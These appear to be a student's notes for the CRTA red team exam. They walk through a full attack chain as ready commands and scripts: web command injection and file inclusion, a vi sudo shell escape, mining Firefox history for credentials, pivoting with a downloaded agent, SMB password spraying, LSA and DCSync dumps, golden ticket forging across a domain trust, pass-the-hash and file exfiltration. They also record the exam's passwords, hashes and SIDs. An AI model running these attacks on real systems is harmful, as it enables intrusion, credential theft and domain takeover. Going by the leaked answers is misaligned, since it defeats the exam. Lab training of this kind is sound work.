General Notes from CRTA Course
Red Team Operations Guide
Comprehensive Methodology
REFER TO: [Link]
CRTA Exam - Red Team Operations Guide
Final Attempt Preparation - Comprehensive Methodology
🎯 Exam Overview
Duration: 6 hours hands-on
Goal: Exfiltrate [Link] file from end servers
Attempts: 2 reverts available (use cautiously)
Target: External & Internal AD Red Teaming
Key Ports: 8091 (monitoring software), 23100 (file monitoring)
Phase 1: Information Gathering
Network Reconnaissance
# Full network scan
nmap -sS -sC -sV -p- -T4 --min-rate=7589 -vv [Link]/24
# Host discovery
nmap -sn [Link]/24
# Targeted scan for common ports
nmap -sS -sC -sV -p 22,80,443,8080,8091,23100 -T4 [Link]/24
# UDP scan for additional services
nmap -sU --top-ports 1000 -T4 [Link]/24
# Service enumeration
nmap -sV --version-intensity 9 -p <discovered_ports> <target_ip>
Web Directory Enumeration
# Primary gobuster scan (--exclude-length 2759 drops the fixed-size page the app returns for non-existent paths instead of a 404)
gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/[Link] -x txt,php,conf,json,xml,bak --exclude-length 2759 -t 64
# Assets directory enumeration
gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/[Link] -x txt,php,conf,json,xml,bak --exclude-length 2759 -t 64
# Flags directory enumeration
gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/[Link] -x txt,php,conf,json,xml,bak --exclude-length 2759 -t 64
# Alternative wordlists
gobuster dir -u [Link] -w /usr/share/wordlists/SecLists/Discovery/Web-Content/[Link] -x txt,php,conf,json,xml,bak,css -t 64
# File-specific enumeration
gobuster dir -u [Link] -w /usr/share/wordlists/SecLists/Discovery/Web-Content/[Link] -t 64
File and Credential Discovery
# Look for sensitive files
curl -s [Link]
curl -s [Link]
curl -s [Link]
# Base64 decode discovered credentials
echo "REJfUEBzc3cwcmQh" | base64 -d
# Check for AWS keys or other sensitive data (access key IDs are uppercase and fixed-length, so no -i there)
grep -rE 'AKIA[0-9A-Z]{16}' <discovered_files>
grep -riE 'secret|password|passwd|token' <discovered_files>
Phase 2: Initial Access & Web Application Exploitation
HotHost Web Application
# Login with the discovered password; keep the session cookie for the requests that follow
curl -X POST [Link] -d "username=admin&password=Very3stroungPassword" -H "Content-Type: application/x-www-form-urlencoded" -c cookies.txt
# Check user roles
curl -s [Link] -H "Cookie: session=<session_cookie>"
# Route enumeration for system files
curl -s [Link]
curl -s [Link]
# Monitor system files route
curl -s "[Link]"
Command Injection via Web Forms
# Test the newsletter email field for OS command injection
# Intercept the POST with Burp Suite and try separator payloads (when editing the raw request, URL-encode ';' as %3B and spaces as +):
email=test@[Link]; whoami
email=test@[Link]; cat /etc/passwd
email=test@[Link]; id
# Also try &&, |, || and a newline (%0a) as the separator in case ';' is filtered
# Look for the command output in the response; if nothing is reflected, test blind with "; sleep 5" and compare response times
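As an added example (not from the course notes), the script below automates the newsletter test: it wraps an arithmetic canary in the usual separators, so the expected string is never present in the request and a page that merely echoes the e-mail back cannot count as a hit, then falls back to a `sleep` timing check when nothing is reflected. TARGET_URL, the `email` field name and the sample response are assumptions.

```python
"""Canary-based OS command-injection probe for a form field.

Added example for the newsletter command-injection step above; it is not part
of the course notes. TARGET_URL and FIELD are hypothetical; the sample response
used for the offline check is constructed.
"""
from __future__ import annotations

import secrets
import time
import urllib.parse
import urllib.request

TARGET_URL = "http://target.example/newsletter"  # hypothetical endpoint
FIELD = "email"
BASE_VALUE = "test@example.com"


def make_canary() -> tuple[str, str]:
    """Return (shell expression, expected output).

    An arithmetic expansion is used instead of `whoami`: its result is not in
    the request, so reflected input alone can never match it.
    """
    a = secrets.randbelow(9000) + 1000
    b = secrets.randbelow(9000) + 1000
    return f"$(({a}*{b}))", str(a * b)


def build_payloads(base: str, expr: str) -> list[str]:
    """Wrap the canary with the usual separators; the newline covers filters that strip ';'."""
    return [
        f"{base}; echo {expr}",
        f"{base} && echo {expr}",
        f"{base} || echo {expr}",
        f"{base} | echo {expr}",
        f"{base}\necho {expr}",
    ]


def detect_injection(body: str, expected: str, sent: str) -> bool:
    """True only if the evaluated result is in the response and was not already in what we sent."""
    return expected in body and expected not in sent


def post(url: str, field: str, value: str, timeout: float = 15.0) -> tuple[str, float]:
    """Send one form POST and return (body, elapsed seconds)."""
    data = urllib.parse.urlencode({field: value}).encode()
    req = urllib.request.Request(
        url, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"}
    )
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return body, time.monotonic() - start


def blind_payload(base: str, delay: int) -> str:
    """Time-based variant for when command output is not reflected."""
    return f"{base}; sleep {delay}"


def looks_delayed(baseline: float, elapsed: float, delay: int) -> bool:
    """A response at least `delay` seconds slower than the baseline indicates the sleep ran."""
    return elapsed - baseline >= delay


def find_injection(url: str = TARGET_URL, field: str = FIELD, base: str = BASE_VALUE) -> str | None:
    """Try reflected detection first, then one time-based check; return the working payload."""
    expr, expected = make_canary()
    for payload in build_payloads(base, expr):
        body, _ = post(url, field, payload)
        if detect_injection(body, expected, payload):
            return payload
    _, baseline = post(url, field, base)
    payload = blind_payload(base, 5)
    _, elapsed = post(url, field, payload)
    return payload if looks_delayed(baseline, elapsed, 5) else None


# Constructed response: the app echoes the input and, being vulnerable, also
# shows the shell's output for $((1234*5678)), which is 7006652
SAMPLE_PAYLOAD = "test@example.com; echo $((1234*5678))"
SAMPLE_RESPONSE = f"<p>Subscribed: {SAMPLE_PAYLOAD}</p>\n<pre>7006652</pre>"


if __name__ == "__main__":
    print(find_injection())
```

`find_injection()` needs the target to be reachable; `detect_injection` and `looks_delayed` can be exercised offline against captured responses.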
File System Access
# Direct file access via monitoring port
curl -s "[Link]"
curl -s "[Link]"
# Alternative payloads
curl -s "[Link]"
curl -s "[Link]"
# Log file enumeration
curl -s "[Link]"
curl -s "[Link]"
curl -s "[Link]"
url=[Link]
Phase 3: Privilege Escalation
User Enumeration
# Extract user information
curl -s "[Link]" | grep app-admin
curl -s "[Link]"
# Check sudo privileges
curl -s "[Link]"
# Common credential locations
curl -s "[Link]admin/.bash_history"
curl -s "[Link]"
Credential Discovery
# Known credentials from exam attempts
# app-admin: @dmin@123
# HotHost password: Very3stroungPassword
# sync_user: Summer@2025
# privilege: Admin@962
# Test SSH access
ssh app-admin@<target_ip>
ssh privilege@<target_ip>
# Passwords: app-admin -> @dmin@123, privilege -> Admin@962
# Check sudo capabilities
sudo -l
# Expected: /usr/bin/vi
Vi Privilege Escalation
# Once logged in as app-admin with vi sudo access
sudo /usr/bin/vi /etc/passwd
# In vi, escape to shell
:!/bin/bash
# Alternative vi escalation
sudo /usr/bin/vi
:set shell=/bin/bash
:shell
Phase 4: Browser Data Mining & Network Discovery
Firefox Profile Analysis
# Find Firefox profiles
sudo find / -iname "*firefox*" 2>/dev/null
sudo find / -type d -name "*.default-release" 2>/dev/null
# Navigate to active profile
cd /home/privilege/.mozilla/firefox/[Link]-release
# Extract bookmarks and history (Firefox locks the database while it runs, so query a copy)
cp [Link] /tmp/places.sqlite
sqlite3 /tmp/places.sqlite
sqlite> .tables
# moz_bookmarks holds no URLs; its fk column points at moz_places.id
sqlite> select b.title, p.url from moz_bookmarks b join moz_places p on b.fk = p.id;
sqlite> select url from moz_places where url like '%@%';
# Look for credentials in bookmark and history URLs
# Common pattern: [Link]
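Added example (not part of the notes): a small Python miner for places.sqlite that copies the locked database, joins moz_bookmarks to moz_places, and pulls user:password@host credentials out of bookmark and history URLs. It assumes the bookmark pattern above means credentials embedded in the URL; the profile data it builds for itself is constructed.

```python
"""Mine a Firefox profile's places.sqlite for URLs that embed credentials.

Added example for the "Firefox Profile Analysis" step above; it is not part of
the course notes. It assumes the "credentials in bookmarks" pattern means URLs
of the form scheme://user:password@host/path; all hosts, users and passwords
below are constructed sample data.
"""
from __future__ import annotations

import os
import shutil
import sqlite3
import tempfile
from urllib.parse import unquote, urlsplit


def open_copy(db_path: str) -> sqlite3.Connection:
    """Firefox keeps places.sqlite locked while it runs, so always query a copy."""
    copy_path = os.path.join(tempfile.mkdtemp(prefix="places_"), "places.sqlite")
    shutil.copy2(db_path, copy_path)
    return sqlite3.connect(copy_path)


def list_urls(conn: sqlite3.Connection) -> list[tuple[str, str | None, str]]:
    """Return (source, title, url) for every bookmark and for history rows with '@' in the URL.

    moz_bookmarks holds no URL itself; its fk column points at moz_places.id.
    """
    bookmarks = conn.execute(
        "SELECT b.title, p.url FROM moz_bookmarks b "
        "JOIN moz_places p ON b.fk = p.id WHERE p.url IS NOT NULL"
    ).fetchall()
    history = conn.execute(
        "SELECT title, url FROM moz_places WHERE url LIKE '%@%'"
    ).fetchall()
    return [("bookmark", t, u) for t, u in bookmarks] + [("history", t, u) for t, u in history]


def embedded_credentials(url: str) -> tuple[str, str, str] | None:
    """Return (user, password, host) if the URL carries userinfo, else None."""
    parts = urlsplit(url)
    if parts.username is None or parts.password is None or parts.hostname is None:
        return None
    # userinfo is percent-encoded in URLs (e.g. '!' stored as %21)
    return unquote(parts.username), unquote(parts.password), parts.hostname


def mine(db_path: str) -> list[dict]:
    """Collect unique (user, host) credentials found in bookmarks or history."""
    conn = open_copy(db_path)
    try:
        found: dict[tuple[str, str], dict] = {}
        for source, title, url in list_urls(conn):
            cred = embedded_credentials(url)
            if cred is None:
                continue
            user, password, host = cred
            # bookmarks come first, so a bookmark wins over its own history row
            found.setdefault((user, host), {
                "user": user, "password": password, "host": host,
                "source": source, "title": title, "url": url,
            })
        return sorted(found.values(), key=lambda r: (r["host"], r["user"]))
    finally:
        conn.close()


def build_sample_db(path: str) -> None:
    """Create a minimal places.sqlite with constructed data (only the columns used above)."""
    conn = sqlite3.connect(path)
    conn.executescript(
        "CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT);"
        "CREATE TABLE moz_bookmarks (id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER, "
        "parent INTEGER, title TEXT);"
    )
    conn.executemany("INSERT INTO moz_places VALUES (?, ?, ?)", [
        (1, "http://svc_backup:S3cret%21pass@10.10.10.30/elfinder/", "elFinder"),
        (2, "http://10.10.10.30/", "MGMT"),
        (3, "https://intranet.example/login", "Intranet"),
        (4, "ftp://admin:Pa55word@files.internal/", None),  # visited, never bookmarked
    ])
    conn.executemany("INSERT INTO moz_bookmarks VALUES (?, ?, ?, ?, ?)", [
        (1, 1, 1, 3, "mgmt file manager"),
        (2, 1, 3, 3, "Intranet"),
    ])
    conn.commit()
    conn.close()


def demo() -> list[dict]:
    """Build the constructed profile database in a temp dir and mine it."""
    path = os.path.join(tempfile.mkdtemp(prefix="profile_"), "places.sqlite")
    build_sample_db(path)
    return mine(path)


if __name__ == "__main__":
    for e in demo():
        print(f"{e['source']:8} {e['user']}:{e['password']} @ {e['host']}  ({e['url']})")
```

Point `mine()` at the real profile's places.sqlite; the history query catches credentials the user typed into the address bar even when no bookmark was saved.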
Log Analysis
# Analyze [Link] for IP addresses (escape the dots, otherwise '.' matches any character)
grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}" /var/log/[Link] | sort -u
grep -F "10.10.10." /var/log/[Link]
# Common internal IP ranges to look for (172.16.0.0/12 spans 172.16 through 172.31)
grep -oE "(10\.10\.10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)[0-9]{1,3}(\.[0-9]{1,3})?" /var/log/[Link] | sort -u
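Added example, not from the notes: the grep above accepts any four dotted numbers, including invalid octets and version strings, so this Python helper validates each hit with the ipaddress module, keeps only RFC 1918 addresses, and groups them by /24 to list the subnets worth routing through the pivot. The log lines are constructed.

```python
"""Pull internal (RFC 1918) addresses out of a log file and group them by /24.

Added example for the log-analysis step above; not part of the course notes.
LOG_SAMPLE is constructed; on the box the input is /var/log/[Link].
"""
import ipaddress
import re
from collections import Counter

# dotted quads not embedded in a longer dotted run, so "1.2.3.4.5" is skipped
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

LOG_SAMPLE = """\
2025-05-01 10:01:12 sync job started from 10.10.10.30
2025-05-01 10:01:13 ldap bind to 10.10.10.2:389 ok
2025-05-01 10:01:14 upstream 8.8.8.8 reachable, local 127.0.0.1 healthy
2025-05-01 10:01:15 agent version 1.2.3.4 checked in from 192.168.50.7
2025-05-01 10:01:16 bad address 999.1.1.1 rejected, range 1.2.3.4.5 ignored
2025-05-01 10:02:00 sync job started from 10.10.10.30
"""


def internal_ips(text: str) -> Counter:
    """Count valid, private, non-loopback IPv4 addresses found in `text`."""
    hits: Counter = Counter()
    for candidate in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:  # e.g. 999.1.1.1
            continue
        # is_private is also true for loopback and link-local, which are never pivot targets
        if ip.is_private and not ip.is_loopback and not ip.is_link_local:
            hits[str(ip)] += 1
    return hits


def pivot_targets(text: str) -> dict:
    """Group the internal addresses by /24: each key is a subnet to route through the pivot."""
    by_net: dict = {}
    for ip in internal_ips(text):
        net = str(ipaddress.ip_network(f"{ip}/24", strict=False))
        by_net.setdefault(net, []).append(ip)
    return {net: sorted(ips, key=ipaddress.ip_address) for net, ips in sorted(by_net.items())}


if __name__ == "__main__":
    for net, ips in pivot_targets(LOG_SAMPLE).items():
        print(net, ips)
```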
Phase 5: Network Pivoting & Lateral Movement
Method 1: Using Ligolo-ng
Ligolo Setup on Attacker Machine
# Attacker machine setup (v0.4.3 proxy and agent release archives)
wget [Link]ng_proxy_0.4.3_Linux_64bit.[Link]
tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.[Link]
chmod +x proxy
wget [Link]ng_agent_0.4.3_Linux_64bit.[Link]
tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.[Link]
chmod +x agent
# Network interface setup: create the tun interface and route the internal subnet through it
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
# if the lab VPN already pushed a route for that subnet via tun0, remove it first so it does not shadow the ligolo route
sudo ip route del [Link]/24 dev tun0
sudo ip route add [Link]/24 dev ligolo
# Start proxy (self-signed certificate, listening on 443)
./proxy -selfcert -laddr [Link]:443
Agent Deployment in Victim Machine
# Serve agent from attacker machine
python3 -m [Link] 8899
# Download and execute on victim
wget [Link]
chmod +x agent
./agent -connect [Link]:443 -ignore-cert
# Back in the proxy console: select the agent session, confirm it sees the internal subnet, then start the tunnel
session
ifconfig
start
Secondary Target Enumeration
# Scan discovered network ([Link]/24)
nmap -v -sn [Link]/24 2>/dev/null
nmap -sS -sC -sV -p 445,3389,5985 [Link]/24
# Identify key targets
# .2 - Domain Controller
# .30 - MGMT server
# .120 - Child Domain Controller
# Web service enumeration
curl -s [Link]
gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/[Link] -x txt,php,html -t 64
# Check for elfinder
curl -s [Link]
curl -s [Link]
curl -s [Link]
Method 2: Proxychains
Pivoting into Restricted Subnet with SSH + Proxychains
Attack Box Network: [Link]/24
Accessible Machine (DC): [Link] (reachable via SSH with valid creds)
Target Subnet: [Link]/24 (only accessible through [Link] )
Goal: Use proxychains to pivot traffic into the [Link]/24 subnet.
Step 1: Create a Dynamic SOCKS Proxy via SSH
Run the following command from your attack box:
ssh -D 1080 -q -C -N user@[Link]
Step 2: Configure Proxychains
Edit the configuration file:
sudo nano /etc/[Link]
Make sure the [ProxyList] section at the bottom points at the SSH SOCKS port:
[ProxyList]
socks5 [Link] 1080
Step 3: Run Tools Through Proxychains
Now you can pivot into [Link]/24 using proxychains. Only full TCP connects are relayed through a SOCKS proxy, so use -sT and skip host discovery with -Pn (SYN scans, ping sweeps and UDP scans do not work through it).
proxychains nmap -sT -Pn [Link]/24
Example output: Discovered live host [Link]
proxychains nc -nv [Link] 445
proxychains nc -nv [Link] 80
Phase 6: SMB Password Spraying & Credential Harvesting
Password Spraying with CrackMapExec
# Create target list
vim [Link]
[Link]
[Link]
[Link]
# Spray discovered credentials
crackmapexec --verbose smb [Link] -u john -p 'User1@#$%6'
crackmapexec --verbose smb [Link] -u corpmngr -p 'User4&*&*'
# Look for [Pwn3d!] indicators showing local admin access
LSA Secrets Dumping
# Dump LSA secrets from a host where the account showed [Pwn3d!] (needs local admin)
crackmapexec --verbose smb [Link] -u john -p 'User1@#$%6' --lsa
# Extract clear-text passwords from the output (cached service and scheduled-task credentials)
# Look for: corpmngr:User4&*&*
# Update /etc/hosts for domain resolution
vim /etc/hosts
[Link] [Link] [Link]
[Link] [Link] [Link]
Phase 7: Active Directory Attacks
Domain Controller Discovery
# Identify Domain Controller
nslookup <domain_name>
dig <domain_name>
# Common DC IP from exam: [Link]
nmap -sS -sC -sV -p 88,135,139,389,445,636,3268,3269 [Link]
KRBTGT Hash Extraction
# Extract krbtgt hash from Child DC (DCSync over DRSUAPI; the account needs replication rights in the child domain)
impacket-secretsdump -debug child/corpmngr:'User4&*&*'@[Link] -just-dc-user 'child\krbtgt'
# Expected output:
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900:::
# krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2
SID Enumeration
# Extract Child domain SID
impacket-lookupsid child/corpmngr:'User4&*&*'@[Link]
# Extract Parent domain SID
impacket-lookupsid child/corpmngr:'User4&*&*'@[Link]
# Expected SIDs:
# Parent SID: S-1-5-21-3375883379-808943238-3239386119
# Child SID: S-1-5-21-3754860944-83624914-1883974761
Golden Ticket Forging
# Forge a golden ticket for the child domain that also carries the parent's Domain Controllers group
# (parent SID + 516) and Enterprise Domain Controllers (S-1-5-9) as extra SIDs; SID filtering is not
# enforced on the child->parent trust inside a forest, so the parent DC honours them
impacket-ticketer -domain [Link] -aesKey ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
# Export ticket (ticketer writes <user>.ccache in the current directory)
export KRB5CCNAME=[Link]
# Request a CIFS service ticket for the parent DC; the hostname must resolve, hence the /etc/hosts entries above
impacket-getST -k -no-pass -spn CIFS/[Link] corpmngr@[Link]
# getST saves the service ticket as <user>@<spn>@<domain>.ccache; point KRB5CCNAME at it
export KRB5CCNAME=corpmngr@CIFS_dc01.[Link]@[Link]
Parent DC Compromise
# DCSync the Parent DC with the forged ticket (Kerberos auth, no password)
impacket-secretsdump -k -no-pass [Link] -just-dc-user 'warfare\Administrator' -debug
# Expected hash:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:b2ab0552928c8399da5161a9eb7fd283:::
# Access Parent DC (pass-the-hash)
impacket-psexec -debug 'warfare/Administrator@[Link]' -hashes aad3b435b51404eeaad3b435b51404ee:b2ab0552928c8399da5161a9eb7fd283
Kerberos Attacks
# ASREPRoast (accounts without Kerberos pre-authentication; works without a password)
impacket-GetNPUsers <domain>/<username> -no-pass -dc-ip [Link] -format hashcat
# Kerberoasting (request TGS tickets for every SPN account)
impacket-GetUserSPNs <domain>/<username>:<password> -dc-ip [Link] -request
# DCSync attack (needs replication rights, e.g. Domain Admin)
impacket-secretsdump <domain>/<username>:<password>@[Link]
# Extract only the krbtgt hash
impacket-secretsdump <domain>/<username>:<password>@[Link] -just-dc-user krbtgt
SMB Enumeration
# SMB shares enumeration
smbclient -L //[Link] -U <username>%<password>
smbmap -H [Link] -u <username> -p <password>
# Access shares
smbclient //[Link]/C$ -U <username>%<password>
smbclient //[Link]/ADMIN$ -U <username>%<password>
Credential Extraction
# Using sync_user credentials. The password contains '@', which impacket's target parser splits on,
# so leave it out of the target string and type it at the prompt (Summer@2025)
impacket-secretsdump <domain>/sync_user@[Link]
# Look for the Administrator NT hash
# Expected from exam: 3d15cb1141d579823f8bb08f1f23e316
# Pass-the-hash (the LM half may be left empty)
impacket-psexec -hashes :3d15cb1141d579823f8bb08f1f23e316 Administrator@[Link]
Phase 8: Data Exfiltration
File System Navigation
# Navigate to the Administrator desktop (psexec drops you into cmd.exe, so Linux commands such as ls/find are not available)
cd C:\Users\Administrator\Desktop
# List files
dir
# Look for [Link] anywhere on the drive (cmd.exe)
dir /s /b C:\[Link]
where /r C:\ [Link]
# PowerShell equivalent
powershell -c "Get-ChildItem -Path C:\ -Recurse -Filter '[Link]' -ErrorAction SilentlyContinue"
# Alternative locations
cd C:\Users\Administrator\Documents
cd C:\temp
cd C:\Windows\Temp
File Transfer Methods
# SMB copy to the attacker (start a share there first, e.g. impacket-smbserver share . -smb2support)
copy [Link] \\<attacker_ip>\share\
# Base64 encode and copy the text out of the shell; decode on the attacker after dropping the
# BEGIN/END CERTIFICATE lines certutil adds: sed '/CERTIFICATE/d' secret_b64.txt | base64 -d > [Link]
certutil -encode [Link] secret_b64.txt
type secret_b64.txt
# PowerShell download (attacker -> victim direction, for staging tools)
powershell -c "Invoke-WebRequest -Uri '[Link]' -OutFile 'C:\temp\[Link]'"
# Python HTTP server (on attacker)
python3 -m [Link] 8000
🔧 Essential Tools & Commands
Impacket Suite
# Install if needed
pip3 install impacket
# Key tools
impacket-secretsdump
impacket-psexec
impacket-smbexec
impacket-wmiexec
impacket-GetUserSPNs
impacket-GetNPUsers
impacket-ticketer
impacket-getST
impacket-lookupsid
Network Pivoting
# Ligolo-ng for network pivoting
# Chisel as alternative
# SSH tunneling for simple cases
Web Exploitation
# Burp Suite for manual testing
# OWASP ZAP for automated scanning
# curl for quick requests
# gobuster for directory enumeration
Network Tools
# nmap for port scanning
# masscan for fast scanning
# netcat for connections
# proxychains for pivoting
SMB Tools
# crackmapexec for password spraying and lateral movement
# smbclient for share access
# smbmap for share enumeration
🎯 Key Exam Patterns
Common Credentials
HotHost: Very3stroungPassword
app-admin: @dmin@123
privilege: Admin@962
john: User1@#$%6
corpmngr: User4&*&*
sync_user: Summer@2025
Base64 encoded: REJfUEBzc3cwcmQh → DB_P@ssw0rd!
Common Ports
8091: NodeJS monitoring application
23100: File monitoring service
80/443: Web services
445: SMB
88: Kerberos
Common Files/Routes
/assets: Static files directory
/pug: Template rendering (LFI vulnerable)
/elfinder: File manager
[Link]: Contains sensitive information
AD_Resources.txt: Contains sync_user credentials
[Link]: Firefox bookmarks and history
Common Paths
C:\Users\Administrator\Desktop: Final target location
/var/log/[Link]: Contains internal IP addresses
/etc/passwd: System users
Director of Engineering salary: 189500
/home/privilege/.mozilla/firefox/: Firefox profile data
Network Segments
[Link]/24: Initial external network
[Link]/24: First internal network
[Link]/24: Second internal network (requires pivoting)
[Link]/24: Final target network
⚠️ Critical Reminders
1. Time Management: 6 hours total - allocate wisely
2. Revert Attempts: Only 2 available - use carefully
3. Flag Order: Submit flags as you discover them
4. Documentation: Keep notes of working commands
5. Breaks: Take breaks to stay fresh
6. Final Goal: Exfiltrate [Link] file
7. Network Pivoting: Essential for accessing internal networks
8. Browser Data: Check Firefox profiles for additional credentials
9. SMB Spraying: Use crackmapexec for efficient credential testing
10. Golden Tickets: Master technique for AD privilege escalation
🚀 Execution Checklist
Network scan ([Link]/24)
Identify monitoring software (port 8091)
Web directory enumeration
Find sensitive files ([Link], etc.)
Extract credentials and decode Base64
Access HotHost application
Exploit file inclusion vulnerabilities
Test command injection in web forms
Escalate privileges via app-admin
Mine Firefox browser data for credentials
Set up network pivoting (ligolo-ng)
Discover internal networks ([Link]/24)
SMB password spraying with crackmapexec
Dump LSA secrets for additional credentials
Access file manager (elfinder)
Extract sync_user credentials
Attack Domain Controller ([Link])
Extract krbtgt hash from Child DC
Perform SID enumeration
Forge Golden Ticket
Compromise Parent DC
Extract Administrator hash
Access Administrator desktop
Locate and exfiltrate [Link]
Good luck on your final attempt! Stay methodical and follow the patterns you've learned.